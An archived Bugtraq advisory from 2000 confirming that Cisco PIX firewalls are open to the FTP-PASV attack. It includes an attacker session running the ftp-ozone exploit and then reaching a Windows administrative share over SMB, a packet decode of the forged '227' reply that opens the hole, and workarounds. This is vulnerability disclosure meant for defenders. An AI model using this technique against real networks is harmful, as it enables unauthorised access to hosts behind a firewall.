Bugtraq mailing list archives
Verified PIX vulnerability to FTP-Pasv attack.
From: monti () USHOST COM (monti)
Date: Sun, 19 Mar 2000 15:07:44 -0600
Greetings,
I sent this to Cisco about 2 weeks ago, and have received a few responses.
Apparentlly a fix is in the works, and may already have been released by
this time unbeknownst to me (although I looked for it and have not found
it yet). In any case, I thought it would be valuable to eventually post
this so that sysadmins had a little more information about how PIX is
affected along with a few possible workarounds. The problem is definitely
very serious, and there are major differences with the way the PIX is
affected than Firewall-1.
Note: This analysis relates solely to the 'server' attack, not the
'client' variation of the attack that Mikael Olsson and Dug Song have
discussed most recently. Mikael's initial posting about the Firewall-1
ftp-pasv vulnerability did prompt me to look into the PIX further though.
As has been already publicized, outbound connections from clients are also
subject to manipulation.
Please see the credits in the attached message.
Eric Monti
Denmac Systems
ericm () denmac com
monti () ushost com
847.291.7760
Summary:
--------
I confirmed and did some more research regarding the PIX hole mentioned by
Jacek Lipkowski on bugtraq entitled:
Re: Addendum to Firewall-1 FTP Server Vulnerability
It is unknown whether Cisco has been made aware of this vulnerability, and
as such I am forwarding my findings.
I was able to verify that PIX is vulnerable to the FTP-Pasv vulnerability
that has been discussed on the Bugtraq mailing list as of late. Here are my
notes and findings. In a nutshell the PIX can be fooled into opening up
ports for inbound connections to a DMZ FTP server if the FTP server can be
fooled into sending back what looks like a valid "227 (xxx,xxx,xxx,xx,prt,prt)
response. The problem on the PIX is that the 'fixup protocol ftp' component
does not provide sufficient enough checks to verify PASV connections before
creating a dynamic hole through the firewall. Note that there are several ways
to get the FTP server to generate the message that will trigger PIX's insecure
behaviour. Please see the 'Relevant Links' section for more on this.
The exploit used for testing was Dug Song's ftp-ozone.c which was posted to
bugtraq.
The PIX tested is running the 4.4(4) version of software. Other versions have
not been tested but are most likelly vulnerable.
Exploit notes:
--------------
Here is the session from the attacker. "ftp-ozone" is the public exploit from
Dug Song. I made a few minor 'asthetic' adjustments and added support for
anonymous login with '-l' (although it wasnt used in this example). The source
code is attached.
-snip-
--------------Exploit Launched-----------------
[root@ix ftp-atk]# ./ftp-ozone 10.1.2.3 139
220 victim Microsoft FTP Service (Version 4.0).
Garbage packet contains:
500
'...........................................................................................................................
Money packet contains:
227 (10,1,2,3,0,139)': command not understood
-------------Opened port connected (NBT)-------
[root@ix ftp-atk]# smbclient \\\\VICTIM\\c$ -I 10.1.2.3 -U administrator
Added interface ip=127.0.0.1 bcast=127.255.255.255 nmask=255.0.0.0
Password: ********
Domain=[VICTIM] OS=[Windows NT 4.0] Server=[NT LAN Manager 4.0]
smb: \> dir
AUTOEXEC.BAT A 0 Mon Mar 13 03:22:58 2000
boot.ini ASR 279 Mon Mar 13 03:15:07 2000
CONFIG.SYS A 0 Mon Mar 13 03:22:58 2000
IO.SYS AHSR 0 Mon Mar 13 03:22:58 2000
MSDOS.SYS AHSR 0 Mon Mar 13 03:22:58 2000
MSSCE D 0 Tue Mar 7 14:29:57 2000
NTDETECT.COM AHSR 26816 Tue Mar 7 11:47:49 2000
ntldr AHSR 156496 Tue Mar 7 11:47:49 2000
pagefile.sys A1073741824 Tue Mar 7 11:51:51 2000
Program Files D 0 Tue Mar 7 11:35:11 2000
RECYCLER DHS 0 Mon Mar 13 09:35:51 2000
TEMP DA 0 Tue Mar 7 14:36:31 2000
WINNT D 0 Tue Mar 7 14:30:05 2000
64706 blocks of size 65536. 43841 blocks available
smb: \> quit
-snip--
As you can see above; after the manipulated packet generated from the FTP
server by ftp-ozone is returned, we are able to connect to the NBT(tcp/139)
service and access a share.
On the PIX with 'logging console debug' set, this was all that showed up:
302001: Built inbound TCP connection 202 for faddr 10.1.2.4/1139 gaddr 10.1.2.3/21 laddr 192.168.205.2/21
I have attached a packet decode generated from tcpdump -w. The IP's used
are as follows: attacker=10.1.2.4, victim-nat=10.1.2.3,
victim-real=192.168.205.2(doesnt appear in decode)
The PIX sits between 10.1.2.4 and 192.168.2.2 (obviously).
In Packet #11 of the decode, in the TCP data segment, you can see what is
triggering the PIX's insecure behavior:
"227 (10,1,2,3,0,139)': command not understood."
This confirms what was assumed; that the only check that the PIX makes
before creating a dynamic PASV conduit is whether the
"227 (xxx,xxx,xxx,xxx,prt,prt)" appears at the beginning of the
packet.
Synopsis/Workarounds:
---------------------
Essentially this is the same as the more widely publicized
Firewall-1 incarnation of the hole (without their patch), only there are a
few major differences to note:
1. The port opened will allow bi-directional traffic (confirmed in
PIX 4.4(4), probably others as well).
2. *ANY* port can be opened, even low-numbered and well-known ports. This
could be worked around with a conduit ACL using explicit denies on the
external interface.
3. The 'fixup protocol ftp' is what appears to be the core of this problem
on the PIX side of it. If it is disabled the exploit (in any
version) will not work. This is what handles PASV FTP on the PIX.
If you disable it though, there are two things to note:
Outbound ftp connections from the inside *have* be made with PASV
ftp clients.
Inbound ftp connections from the outside world cannot use PASV.
There may be other workarounds than those cited above. Any comments/suggestions
are welcome!
Relevant Links:
---------------
Vulnerability description/workarounds for Firewall-1 incarnation of the bug:
http://www.securityfocus.com/vdb/bottom.html?vid=979
Link to bugtraq mailing list archive discussing vulnerability and Checkpoint
workaround (please note comments about the problems with the Checkpoint patch
and some of the things to watch out for in implementing a fix):
Pine.LNX.4.21.0002142201030.4674-100000 () ns ldc ro
">http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-02-8&thread=Pine.LNX.4.21.0002142201030.4674-100000
() ns ldc ro
</A>
Link to Checkpoint's patch:
http://www.checkpoint.com/techsupport/alerts/pasvftp.html
Credits:
--------
I did not find this hole (initially).
It was discovered officially and publicized by several other people.
Much thanks goes to these folks!
Jacek Lipkowski
sq5bpf () ACID CH PW EDU PL
For originally verifying PIX's vulnerability based on Firewall-1 discussions.
Mikael Olsson
mikael.olsson () enternet se
For original bugtraq postings, insights regarding this issue, and Firewall-1
confirmation.
Dataprotect:
John McDonald <jm () dataprotect com>
Thomas Lopatic <tl () dataprotect com>
For their verification of the vulnerability on Checkpoint Firewall-1.
Dug Song:
dugsong () monkey org
For original public exploit code.
Please see www.securityfocus.com bugtraq archive for all relevant posts.
I am copying all of the above people, and will be waiting for 10 days for a
response from Cisco regarding this hole before releasing any more information
publicly. If need be, I can wait longer if a fix is in the works, although
the existence of the bug has already been made public. I cannot control
whether this will be forwarded to other parties by the other people CC'd
so I leave that to their discretion.
Thanks,
Eric Monti
Denmac Systems
ericm () denmac com
847.291.7760
Packet 1
Timestamp: 15:02:37.130283
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 60 bytes
Identification: 0x04CF
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D4C
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818403974
Acknowledgement Number: 0000000000
Header Length: 40 bytes (data=0)
Flags: URG=off, ACK=off, PSH=off
RST=off, SYN=on, FIN=off
Window Advertisement: 128 bytes
Checksum: 0x78CB
Urgent Pointer: 0
<Options not displayed>
TCP Data
<No data>
-----------------------------------------------------------------
Packet 2
Timestamp: 15:02:37.130720
Source Ethernet Address: 00:D0:B7:0E:18:AB
Destination Ethernet Address: 00:50:04:28:FE:EB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 44 bytes
Identification: 0x4311
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 128
Encapsulated Protocol: TCP
Header Checksum: 0x9F19
Source IP Address: 10.1.2.3
Destination IP Address: 10.1.2.4
TCP Header
Source Port: 21 (ftp)
Destination Port: 1139 (<unknown>)
Sequence Number: 1212576390
Acknowledgement Number: 1818403975
Header Length: 24 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=on, FIN=off
Window Advertisement: 8760 bytes
Checksum: 0x8CFE
Urgent Pointer: 0
<Options not displayed>
TCP Data
<No data>
-----------------------------------------------------------------
Packet 3
Timestamp: 15:02:37.130765
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 40 bytes
Identification: 0x04D0
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D5F
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818403975
Acknowledgement Number: 1212576391
Header Length: 20 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 128 bytes
Checksum: 0xC673
Urgent Pointer: 0
TCP Data
<No data>
-----------------------------------------------------------------
Packet 4
Timestamp: 15:02:37.131178
Source Ethernet Address: 00:D0:B7:0E:18:AB
Destination Ethernet Address: 00:50:04:28:FE:EB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 88 bytes
Identification: 0x4411
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 128
Encapsulated Protocol: TCP
Header Checksum: 0x9DED
Source IP Address: 10.1.2.3
Destination IP Address: 10.1.2.4
TCP Header
Source Port: 21 (ftp)
Destination Port: 1139 (<unknown>)
Sequence Number: 1212576391
Acknowledgement Number: 1818403975
Header Length: 20 bytes (data=48)
Flags: URG=off, ACK=on, PSH=on
RST=off, SYN=off, FIN=off
Window Advertisement: 8760 bytes
Checksum: 0x0458
Urgent Pointer: 0
TCP Data
220 wapp2 Microsoft FTP Service (Version 4.0)..
-----------------------------------------------------------------
Packet 5
Timestamp: 15:02:37.131204
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 40 bytes
Identification: 0x04D1
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D5E
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818403975
Acknowledgement Number: 1212576439
Header Length: 20 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 80 bytes
Checksum: 0xC673
Urgent Pointer: 0
TCP Data
<No data>
-----------------------------------------------------------------
Packet 6
Timestamp: 15:02:47.126818
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 163 bytes
Identification: 0x04D2
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1CE2
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818403975
Acknowledgement Number: 1212576439
Header Length: 20 bytes (data=123)
Flags: URG=off, ACK=on, PSH=on
RST=off, SYN=off, FIN=off
Window Advertisement: 128 bytes
Checksum: 0x96BF
Urgent Pointer: 0
TCP Data
...........................................................................................................................
-----------------------------------------------------------------
Packet 7
Timestamp: 15:02:47.248131
Source Ethernet Address: 00:D0:B7:0E:18:AB
Destination Ethernet Address: 00:50:04:28:FE:EB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 40 bytes
Identification: 0x4511
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 128
Encapsulated Protocol: TCP
Header Checksum: 0x9D1D
Source IP Address: 10.1.2.3
Destination IP Address: 10.1.2.4
TCP Header
Source Port: 21 (ftp)
Destination Port: 1139 (<unknown>)
Sequence Number: 1212576439
Acknowledgement Number: 1818404098
Header Length: 20 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 8637 bytes
Checksum: 0xA48B
Urgent Pointer: 0
TCP Data
<No data>
-----------------------------------------------------------------
Packet 8
Timestamp: 15:02:47.248184
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 69 bytes
Identification: 0x04D3
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D3F
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818404098
Acknowledgement Number: 1212576439
Header Length: 20 bytes (data=29)
Flags: URG=off, ACK=on, PSH=on
RST=off, SYN=off, FIN=off
Window Advertisement: 128 bytes
Checksum: 0x2602
Urgent Pointer: 0
TCP Data
227 (10,1,2,3,0,139).
-----------------------------------------------------------------
Packet 9
Timestamp: 15:02:47.248558
Source Ethernet Address: 00:D0:B7:0E:18:AB
Destination Ethernet Address: 00:50:04:28:FE:EB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 168 bytes
Identification: 0x4611
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 128
Encapsulated Protocol: TCP
Header Checksum: 0x9B9D
Source IP Address: 10.1.2.3
Destination IP Address: 10.1.2.4
TCP Header
Source Port: 21 (ftp)
Destination Port: 1139 (<unknown>)
Sequence Number: 1212576439
Acknowledgement Number: 1818404127
Header Length: 20 bytes (data=128)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 8608 bytes
Checksum: 0x168C
Urgent Pointer: 0
TCP Data
500
'...........................................................................................................................
-----------------------------------------------------------------
Packet 10
Timestamp: 15:02:47.248599
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 40 bytes
Identification: 0x04D4
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D5B
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818404127
Acknowledgement Number: 1212576567
Header Length: 20 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 128 bytes
Checksum: 0xC52B
Urgent Pointer: 0
TCP Data
<No data>
-----------------------------------------------------------------
Packet 11
Timestamp: 15:02:47.248836
Source Ethernet Address: 00:D0:B7:0E:18:AB
Destination Ethernet Address: 00:50:04:28:FE:EB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 94 bytes
Identification: 0x4711
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 128
Encapsulated Protocol: TCP
Header Checksum: 0x9AE7
Source IP Address: 10.1.2.3
Destination IP Address: 10.1.2.4
TCP Header
Source Port: 21 (ftp)
Destination Port: 1139 (<unknown>)
Sequence Number: 1212576567
Acknowledgement Number: 1818404127
Header Length: 20 bytes (data=54)
Flags: URG=off, ACK=on, PSH=on
RST=off, SYN=off, FIN=off
Window Advertisement: 8608 bytes
Checksum: 0x1DD1
Urgent Pointer: 0
TCP Data
227 (10,1,2,3,0,139)': command not understood.
-----------------------------------------------------------------
Packet 12
Timestamp: 15:02:47.266742
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 40 bytes
Identification: 0x04D5
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D5A
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818404127
Acknowledgement Number: 1212576621
Header Length: 20 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 128 bytes
Checksum: 0xC4F5
Urgent Pointer: 0
TCP Data
<No data>
Current thread:
- con\con is a old thing (anyway is cool) Ussr Labs (Mar 06)
- Re: con\con is a old thing (anyway is cool) Stephen White (Mar 08)
- Realplayer update pedward () WEBCOM COM (Mar 09)
- Re: con\con is a old thing (anyway is cool) Elias Levy (Mar 11)
- Re: con\con is a old thing (anyway is cool) YUFU (Mar 11)
- <Possible follow-ups>
- Re: con\con is a old thing (anyway is cool) Oliver Friedrichs (Mar 15)
- Re: con\con is a old thing (anyway is cool) Bernd Luevelsmeyer (Mar 17)
- Re: con\con is a old thing (anyway is cool) David LeBlanc (Mar 17)
- Verified PIX vulnerability to FTP-Pasv attack. monti (Mar 19)